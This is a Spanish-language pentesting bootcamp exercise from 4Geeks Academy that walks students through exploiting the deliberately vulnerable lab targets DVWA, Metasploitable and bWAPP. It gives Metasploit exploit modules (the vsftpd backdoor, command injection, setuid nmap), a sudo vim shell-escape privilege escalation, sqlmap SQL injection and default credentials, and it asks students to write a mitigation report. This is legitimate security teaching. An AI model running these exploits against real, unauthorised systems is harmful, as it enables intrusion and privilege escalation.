Proyecto de Explotación en Pentesting en un Sitio Web Vulnerable

Proyecto de Explotación en Pentesting en un Sitio Web Vulnerable

By @rosinni and other contributors at 4Geeks Academy

These instructions are available in english

Antes de empezar...

¡Te necesitamos! Estos ejercicios se crean y mantienen en colaboración con personas como tú. Si encuentras algún error o falta de ortografía, contribuye y/o repórtalo.

🌱 ¿Cómo empezar este proyecto?

¡No clones este repositorio! solo sigue las instrucciones.

Este ejercicio tiene como objetivo enseñar a los estudiantes cómo explotar las vulnerabilidades encontradas en una web vulnerable (DVWA) usando Metasploitable. Esto incluye la detección de vulnerabilidades explotables y la escalación de privilegios. Nota: No se realizarán actividades de post-explotación.

Este es el tercero de 4 proyectos que te llevarán a conocer a fondo cómo es el mundo del pentesting. El objetivo es realizar todas las fases del pentesting. Esta tercera fase se enfoca en la "Explotación" en un Sitio Web Vulnerable.

Requisitos

• Finalizar el reporte de reconocimiento de Pentesting [Pentesting report v1](wait for url).
• Tener acceso a una máquina con DVWA.
• Tener acceso a una máquina atacante (por ejemplo, Kali Linux).

Herramientas necesarias

• Nmap (para confirmar vulnerabilidades)
• Metasploit Framework
• Acceso a bases de datos de vulnerabilidades (como Exploit-DB)
• Herramientas adicionales según las vulnerabilidades (e.g., Hydra para fuerza bruta, netcat)

📝 Instrucciones

Paso 1: Confirmar vulnerabilidades

• Inicia la máquina DVWA.
• Accede a DVWA a través de tu navegador web en http://<IP-Target>/dvwa.
• Inicia sesión en DVWA con las credenciales predeterminadas:
  • Usuario: admin
  • Contraseña: password
• Obtén la dirección IP de DVWA usando ifconfig. Ejemplo:

  1ifconfig

• En tu máquina atacante (por ejemplo, Kali Linux), abre una terminal y ejecuta el siguiente comando para confirmar las vulnerabilidades, reemplazando <IP-Target> con la IP de la máquina DVWA:

  1sudo nmap -sV --script=vuln <IP-Target>

Paso 2: Detectar vulnerabilidades explotables

• Investiga las vulnerabilidades confirmadas usando bases de datos como Exploit-DB o CVE Details.
• Identifica exploits disponibles para las vulnerabilidades detectadas.

Paso 3: Exploitar vulnerabilidades

• Usa Metasploit para explotar las vulnerabilidades identificadas.
  • Ejemplo: Explotar una vulnerabilidad en el servicio FTP.

    1msfconsole
    2use exploit/unix/ftp/vsftpd_234_backdoor
    3set RHOST <IP-Target>
    4run

  • Ejemplo: Explotar una vulnerabilidad de Command Injection en DVWA.

    1msfconsole
    2use exploit/unix/webapp/dvwa_command_injection
    3set RHOST <IP-Target>
    4set RPORT 80
    5set TARGETURI /dvwa/vulnerabilities/exec/
    6run

Paso 4: Escalar privilegios

• Identifica técnicas de escalación de privilegios en la máquina objetivo.
• Usa exploits locales o técnicas manuales para escalar privilegios.
  • Ejemplo: Escalación de privilegios usando un exploit local.

    1use exploit/linux/local/setuid_nmap
    2set SESSION <session_id>
    3run

  • Ejemplo: Escalación de privilegios usando una vulnerabilidad de sudo.

    1sudo -l
    2sudo vim -c '!sh'

Paso 5: Documentar el proceso de explotación

• Detalla cada paso realizado durante la explotación.
  • Incluye comandos utilizados, capturas de pantalla y resultados obtenidos.
• Redacta un reporte de Pentesting v2 con las vulnerabilidades explotadas, los métodos utilizados y los resultados.
• Reflexiona sobre el impacto de las vulnerabilidades explotadas.
• Propón medidas de mitigación para las vulnerabilidades encontradas y explotadas.

Formato del Reporte de Pentesting v2

• Introducción

  • Resumen del objetivo y alcance del ejercicio.

• Metodología

  • Herramientas y técnicas utilizadas.

• Resultados

  • Detalles de las vulnerabilidades explotadas.
  • Comandos y herramientas utilizadas para la explotación.
  • Capturas de pantalla y evidencias.

• Escalación de Privilegios

  • Técnicas utilizadas y resultados obtenidos.

• Mitigación

  • Propuestas para remediar las vulnerabilidades explotadas.

• Conclusión

  • Impacto de las vulnerabilidades y reflexión sobre el proceso.

😎 ¿Te sientes seguro? ¿Quieres seguir practicando?

Plus: Realizar el ejercicio usando BeeBox

Si quieres seguir practicando y aplicar tus conocimientos en otro entorno, puedes usar BeeBox con bWAPP: aprovechando que ya has trabajado con BeeBox, aquí tienes una opción para realizar el ejercicio utilizando BeeBox:

1. Iniciar BeeBox y bWAPP:

   • Inicia la máquina virtual BeeBox.
   • Asegúrate de que bWAPP esté funcionando.

2. Confirmar vulnerabilidades:

   • Obtén la dirección IP de BeeBox usando ifconfig.
   • En tu máquina atacante, usa Nmap para escanear las vulnerabilidades en bWAPP.

     1sudo nmap -sV --script=vuln <IP-Target>

3. Detectar vulnerabilidades explotables:

   • Investiga las vulnerabilidades confirmadas en bWAPP utilizando bases de datos como Exploit-DB.

4. Explotar vulnerabilidades:

   • Usa herramientas como sqlmap para explotar las vulnerabilidades en bWAPP.
     • Ejemplo: Inyección SQL

       1sqlmap -u "http://<IP-Target>/bWAPP/sqli_1.php?id=1" --dbs

5. Documentar el proceso:

   • Detalla cada paso realizado durante la explotación en BeeBox.
   • Incluye comandos utilizados, capturas de pantalla y resultados obtenidos.

Esta estructura permite a los estudiantes aplicar y comparar sus habilidades en dos entornos diferentes, primero con Metasploitable y DVWA, y luego con BeeBox y bWAPP. El ejercicio principal proporciona una base sólida en el uso de Metasploit y la explotación de una máquina vulnerable, mientras que el plus amplía la experiencia a otro entorno y herramienta. Al documentar y reflexionar sobre cada paso, estarás mejor preparado para enfrentar desafíos en el mundo real del pentesting.

Colaboradores

Gracias a estas personas maravillosas (emoji key):

1. Rosinni Rodríguez (rosinni) contribución: (build-tutorial) ✅, (documentación) 📖

2. Alejandro Sanchez (alesanchezr), contribución: (detector bugs) 🐛

Este proyecto sigue la especificación all-contributors. ¡Todas las contribuciones son bienvenidas!

Este y otros ejercicios son usados para aprender a programar por parte de los alumnos de 4Geeks Academy Coding Bootcamp realizado por Alejandro Sánchez y muchos otros contribuyentes. Conoce más sobre nuestros Cursos de Programación para convertirte en Full Stack Developer, o nuestro Data Science Bootcamp.Tambien puedes adentrarte al mundo de ciberseguridad con nuestro Bootcamp de ciberseguridad.